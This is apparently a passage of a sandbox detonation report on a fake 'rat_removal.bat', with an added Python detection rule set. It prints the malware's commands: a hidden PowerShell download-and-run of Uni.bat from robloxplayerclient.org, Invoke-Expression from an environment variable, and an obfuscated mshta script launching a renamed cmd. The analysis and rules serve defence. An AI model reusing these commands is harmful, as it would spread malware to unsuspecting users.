PID 3252 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3252 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3252 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3028 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%

Network

Country Destination Domain Proto
US 8.8.8.8:53 robloxplayerclient.org udp
US 172.67.137.17:443 robloxplayerclient.org tcp
US 8.8.8.8:53 17.137.67.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gbaqd0ga.5jc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1996-12-0x000001C8CD5C0000-0x000001C8CD5E2000-memory.dmp

memory/1996-13-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1996-14-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-15-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-16-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-20-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 7b10ed9636b737ceadbb064086ff94ca
SHA1 de075e9898da93e3ebb17b86240716ef44df3574
SHA256 19086f3bc2b071cf02d549551dae87f5baa0eee53305881d77b25a9be9e4e1ad
SHA512 2bcd2d8f188498b577aedcb8e017e3a24ce61e1933090d20fbbfacca90bf5b3e4a2a9b213a479bd19a0aedf622f6ffa08f042b40bc73f66c8c1534966d5b9eeb

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/2444-31-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/2444-32-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-33-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-34-0x000002B9ECA40000-0x000002B9ECA86000-memory.dmp

memory/2444-35-0x000002B9F4C70000-0x000002B9F571C000-memory.dmp

memory/2444-36-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-37-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-38-0x000002B9F5720000-0x000002B9F620C000-memory.dmp

memory/2444-39-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-41-0x00007FFB40EC0000-0x00007FFB40F7D000-memory.dmp

memory/2444-42-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-43-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/2444-44-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-45-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-46-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-47-0x000002B9F65E0000-0x000002B9F66DC000-memory.dmp

memory/2444-48-0x000002B9EC7C0000-0x000002B9EC7E2000-memory.dmp

memory/2444-49-0x000002B9ECA00000-0x000002B9ECA06000-memory.dmp

memory/2444-50-0x000002B9F66E0000-0x000002B9F673E000-memory.dmp

memory/2444-51-0x000002B9F6740000-0x000002B9F6798000-memory.dmp

memory/2444-52-0x000002B9EC2D0000-0x000002B9EC2D6000-memory.dmp

memory/2444-53-0x000002B9ECA10000-0x000002B9ECA18000-memory.dmp

memory/2444-54-0x000002B9EC9F0000-0x000002B9EC9F6000-memory.dmp

memory/2444-55-0x000002B9F67A0000-0x000002B9F67DE000-memory.dmp

memory/2444-56-0x000002B9F67E0000-0x000002B9F740C000-memory.dmp

memory/2444-57-0x000002B9F7410000-0x000002B9F74C2000-memory.dmp

memory/2444-58-0x000002B9F74C0000-0x000002B9F74F6000-memory.dmp

memory/2444-59-0x000002B9F7500000-0x000002B9F7558000-memory.dmp

memory/2444-60-0x000002B9F7560000-0x000002B9F758E000-memory.dmp

memory/2444-61-0x00007FF7093F0000-0x00007FF70945E000-memory.dmp

memory/2444-63-0x000002B9ECA20000-0x000002B9ECA28000-memory.dmp

memory/2444-64-0x0000000180000000-0x0000000180007000-memory.dmp

memory/2444-67-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-74-0x00007FFB206D8000-0x00007FFB206D9000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-14 05:24

Reported

2024-03-14 05:27

Platform

win10-20240221-en

Max time kernel

79s

Max time network

141s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\rescache\_merged\4272278488\3302449443.pri | C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 4896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 4896 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 212 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 212 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 2908 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 2908 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 3912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 3912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4896 wrote to memory of 4556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4896 wrote to memory of 1508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4896 wrote to memory of 1508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4896 wrote to memory of 860 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 860 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 1160 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1160 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 3412 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 3412 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 1072 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 1072 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe

"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
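Added example, not part of the report and not the sandbox's own signature logic: a small Python rule set run over constructed process-creation records modelled on the process list above (image path plus command line, the two fields a Sysmon event 1 or an EDR process-start record supplies). The rules encode the features this detonation shows: a hidden, policy-bypassing PowerShell; a downloader cmdlet writing a script into the Temp directory; mshta handed a javascript: URI; copies of system binaries living directly under C:\Windows with a prefix on their name; Invoke-Expression fed from an environment variable; and the %VAR:token=% substitution. The records are constructed and shortened (the mshta argument is cut down to its shape, and the list is not the full tree); the rule names and regular expressions are the editor's and are heuristics that need tuning before use in a real environment.

```python
import ntpath
import re

# Added example (editor's code, not the sandbox's signature engine). Heuristic
# rules over process-creation records shaped like the chain in this report.

# Constructed records modelled on the process list above; the mshta argument is
# cut down to its shape and the list is not the full tree.
RECORDS = [
    {"image": "C:\\Windows\\system32\\cmd.exe",
     "cmdline": 'C:\\Windows\\system32\\cmd.exe /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\rat_removal.bat"'},
    {"image": "C:\\Windows\\system32\\findstr.exe",
     "cmdline": "findstr /L /I set C:\\Users\\Admin\\AppData\\Local\\Temp\\rat_removal.bat"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                "\"Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' "
                "-OutFile: 'C:\\Users\\Admin\\AppData\\Local\\Temp\\Uni.bat'\""},
    {"image": "C:\\Windows\\system32\\cmd.exe",
     "cmdline": 'C:\\Windows\\system32\\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "'},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -noprofile -windowstyle hidden"},
    {"image": "C:\\Windows\\$sxr-mshta.exe",
     "cmdline": "C:\\Windows\\$sxr-mshta.exe \"javascript:document['wr'+'it'+'e']('<html>');close();\""},
    {"image": "C:\\Windows\\$sxr-cmd.exe",
     "cmdline": '"C:\\Windows\\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'},
    {"image": "C:\\Windows\\system32\\chcp.com", "cmdline": "chcp.com 437"},
]

SYSTEM_BINARIES = ("cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                   "rundll32.exe", "regsvr32.exe")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

PS_BYPASS = re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I)          # -ep / -exec / -ExecutionPolicy
PS_HIDDEN = re.compile(r"-w\w*\s+hidden", re.I)                   # -w / -win / -WindowStyle
DOWNLOADER = re.compile(r"\b(?:invoke-webrequest|iwr|start-bitstransfer|downloadfile|downloadstring)\b", re.I)
TEMP_PAYLOAD = re.compile(r"\\temp\\[^\s'\"]+\.(?:bat|cmd|ps1|exe|dll|vbs|js|hta)\b", re.I)
SCRIPT_URI = re.compile(r"\b(?:javascript|vbscript):", re.I)
IEX_ENV = re.compile(r"\b(?:invoke-expression|iex)\b[^;]*\$env:", re.I)
CMD_SUBSTITUTION = re.compile(r"%[^%:=\s]+:[^%=]+=[^%]*%")      # %VAR:old=new%


def system_binary_outside_system_dir(image):
    """True for a file whose name ends in a LOLBin name but does not live in
    System32/SysWOW64, e.g. C:\\Windows\\$sxr-cmd.exe."""
    low = image.lower()
    if low.startswith(SYSTEM_DIRS):
        return False
    return ntpath.basename(low).endswith(SYSTEM_BINARIES)


def evaluate(record):
    """Return the names of every rule the record trips, in a fixed order."""
    image, cmd = record["image"], record["cmdline"]
    name = ntpath.basename(image.lower())
    hits = []
    if PS_BYPASS.search(cmd) and PS_HIDDEN.search(cmd):
        hits.append("powershell_bypass_hidden")
    if DOWNLOADER.search(cmd) and TEMP_PAYLOAD.search(cmd):
        hits.append("download_payload_to_temp")
    if name.endswith("mshta.exe") and SCRIPT_URI.search(cmd):
        hits.append("mshta_script_uri")
    if system_binary_outside_system_dir(image):
        hits.append("system_binary_outside_system_dir")
    if IEX_ENV.search(cmd):
        hits.append("iex_from_environment_variable")
    if CMD_SUBSTITUTION.search(cmd):
        hits.append("cmd_variable_substitution")
    return hits


def scan(records):
    """Flatten to (image, rule) pairs so a whole process chain can be scored at once."""
    return [(r["image"], hit) for r in records for hit in evaluate(r)]


if __name__ == "__main__":
    for image, rule in scan(RECORDS):
        print(f"{rule:35} {image}")
```

The rule that carries most weight here is the cheapest one: a file whose name ends in cmd.exe or mshta.exe but sits directly under C:\Windows rather than in System32 is not something a legitimate installer produces, and it does not depend on the command-line content at all. The PowerShell and mshta rules are well known and easy for an operator to dodge by reordering or abbreviating switches, so in practice they serve as corroboration rather than as a stand-alone alert.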

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | robloxplayerclient.org | udp
US | 104.21.7.174:443 | robloxplayerclient.org | tcp
US | 8.8.8.8:53 | 174.7.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | watson.telemetry.microsoft.com | udp
US | 20.189.173.22:443 | watson.telemetry.microsoft.com | tcp
US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 22.173.189.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

memory/1160-8-0x0000028671340000-0x0000028671362000-memory.dmp

memory/1160-9-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1160-10-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-11-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-14-0x0000028671500000-0x0000028671576000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orwd3zkq.uw1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1160-29-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-39-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 6bdab73b1ae1fb7629bd9c250354a250
SHA1 24fa877ae0db1d2f1b24ce29ea8eddefddc4afc6
SHA256 e0fe368de1cd2f3f769182e24944f9e03e7d0483aded6dc27d20b53680ca67bb
SHA512 f721eff91fdce63097a12fa8a1cf6b48664ad2563439b03369c201c893e502e3a43191ded7782795d0ec84199307042afb8c89cfddfdb39b55286f558dc0357a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d737fc27bbf2f3bd19d1706af83dbe3f
SHA1 212d219394124968b50769c371121a577d973985
SHA256 b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

memory/1072-44-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-46-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-48-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-77-0x00000147B3BC0000-0x00000147B3BFC000-memory.dmp

memory/1072-96-0x00000147B3530000-0x00000147B3540000-memory.dmp

C:\Users\Admin\Desktop\New Compressed (zipped) Folder.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

memory/1072-99-0x00000147FC270000-0x00000147FCD1C000-memory.dmp

memory/1072-100-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-101-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-103-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-104-0x00000147FCD20000-0x00000147FD80C000-memory.dmp

memory/1072-107-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-109-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp

memory/1072-108-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

memory/1072-110-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-111-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-112-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-113-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-132-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-139-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

memory/1072-140-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-141-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-142-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp